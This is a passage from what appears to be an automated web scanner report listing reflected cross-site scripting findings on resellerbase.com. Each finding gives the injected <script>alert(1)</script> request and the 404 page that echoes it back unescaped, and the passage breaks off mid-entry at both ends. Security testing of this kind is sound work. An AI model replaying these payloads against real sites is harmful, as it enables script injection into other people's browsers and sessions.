Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail897f3<script>alert(1)</script>d6d3e1ac4e6/6/rating.php was not found on this server.</p>
...[SNIP]...

2.3468. http://www.resellerbase.com/detail/6/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57c33<script>alert(1)</script>2c01e301bc58ac061 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/657c33<script>alert(1)</script>2c01e301bc58ac061/rating.php?id=6&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/657c33<script>alert(1)</script>2c01e301bc58ac061/rating.php?id=6&rating=5 was not found on this server.</p>
...[SNIP]...

2.3469. http://www.resellerbase.com/detail/6/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e0f3d<script>alert(1)</script>7e47979e75b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6e0f3d<script>alert(1)</script>7e47979e75b/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6e0f3d<script>alert(1)</script>7e47979e75b/rating.php was not found on this server.</p>
...[SNIP]...

2.3470. http://www.resellerbase.com/detail/6/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 332c6<script>alert(1)</script>51e5aa7e6c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/rating.php332c6<script>alert(1)</script>51e5aa7e6c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/rating.php332c6<script>alert(1)</script>51e5aa7e6c was not found on this server.</p>
...[SNIP]...

2.3471. http://www.resellerbase.com/detail/6/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6b897<script>alert(1)</script>da839ce115dbb1bbd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/6/rating.php6b897<script>alert(1)</script>da839ce115dbb1bbd?id=6&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/rating.php6b897<script>alert(1)</script>da839ce115dbb1bbd?id=6&rating=5 was not found on this server.</p>
...[SNIP]...

2.3472. http://www.resellerbase.com/detail/6/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 85ef4<script>alert(1)</script>2420e9c696bcfd68c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/6/rating.php/85ef4<script>alert(1)</script>2420e9c696bcfd68c?id=6&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/rating.php/85ef4<script>alert(1)</script>2420e9c696bcfd68c?id=6&rating=5 was not found on this server.</p>
...[SNIP]...

2.3473. http://www.resellerbase.com/detail/6/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b9ae8<script>alert(1)</script>1030dd3b5f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/rating.php?b9ae8<script>alert(1)</script>1030dd3b5f2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:23:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/rating.php?b9ae8<script>alert(1)</script>1030dd3b5f2=1 was not found on this server.</p>
...[SNIP]...

2.3474. http://www.resellerbase.com/detail/6/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 599f7<script>alert(1)</script>2c85480efd8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail599f7<script>alert(1)</script>2c85480efd8/6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail599f7<script>alert(1)</script>2c85480efd8/6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3475. http://www.resellerbase.com/detail/6/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 215cb<script>alert(1)</script>1e47e9c7b13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6215cb<script>alert(1)</script>1e47e9c7b13/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6215cb<script>alert(1)</script>1e47e9c7b13/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3476. http://www.resellerbase.com/detail/6/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 18d32<script>alert(1)</script>f7db25daa8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/search.php18d32<script>alert(1)</script>f7db25daa8?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/search.php18d32<script>alert(1)</script>f7db25daa8?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3477. http://www.resellerbase.com/detail/6/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bb2c8<a>5de352e853c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/search.php?keyword=search...&Submit3=Searchbb2c8<a>5de352e853c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/search.php?keyword=search...&Submit3=Searchbb2c8<a>5de352e853c&opt=2 was not found on this server.</p>
...[SNIP]...

2.3478. http://www.resellerbase.com/detail/6/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload af551<a>a5ab12b654a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/search.php?keyword=search...af551<a>a5ab12b654a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/search.php?keyword=search...af551<a>a5ab12b654a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3479. http://www.resellerbase.com/detail/6/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 22d3e<script>alert(1)</script>6319939b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/search.php?keyword=search...&Submit3=Search&opt=2&22d3e<script>alert(1)</script>6319939b7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/search.php?keyword=search...&Submit3=Search&opt=2&22d3e<script>alert(1)</script>6319939b7=1 was not found on this server.</p>
...[SNIP]...

2.3480. http://www.resellerbase.com/detail/6/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload bcb23<a>bc1d8c6ef16 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/search.php?keyword=search...&Submit3=Search&opt=2bcb23<a>bc1d8c6ef16 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/search.php?keyword=search...&Submit3=Search&opt=2bcb23<a>bc1d8c6ef16 was not found on this server.</p>
...[SNIP]...

2.3481. http://www.resellerbase.com/detail/6/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c390<script>alert(1)</script>e05e1678c65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7c390<script>alert(1)</script>e05e1678c65/6/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7c390<script>alert(1)</script>e05e1678c65/6/themes/ was not found on this server.</p>
...[SNIP]...

2.3482. http://www.resellerbase.com/detail/6/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 415a9<script>alert(1)</script>d4385fedfe4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6415a9<script>alert(1)</script>d4385fedfe4/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6415a9<script>alert(1)</script>d4385fedfe4/themes/ was not found on this server.</p>
...[SNIP]...

2.3483. http://www.resellerbase.com/detail/6/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 83842<script>alert(1)</script>86f6fdcb2bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes83842<script>alert(1)</script>86f6fdcb2bb/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes83842<script>alert(1)</script>86f6fdcb2bb/ was not found on this server.</p>
...[SNIP]...

2.3484. http://www.resellerbase.com/detail/6/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 26658<script>alert(1)</script>ceb74d643c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/?26658<script>alert(1)</script>ceb74d643c3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.3485. http://www.resellerbase.com/detail/6/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99a32<script>alert(1)</script>5315d9390a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail99a32<script>alert(1)</script>5315d9390a3/6/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail99a32<script>alert(1)</script>5315d9390a3/6/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3486. http://www.resellerbase.com/detail/6/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8c64<script>alert(1)</script>94f2ee4ee41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6f8c64<script>alert(1)</script>94f2ee4ee41/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:18 GMT
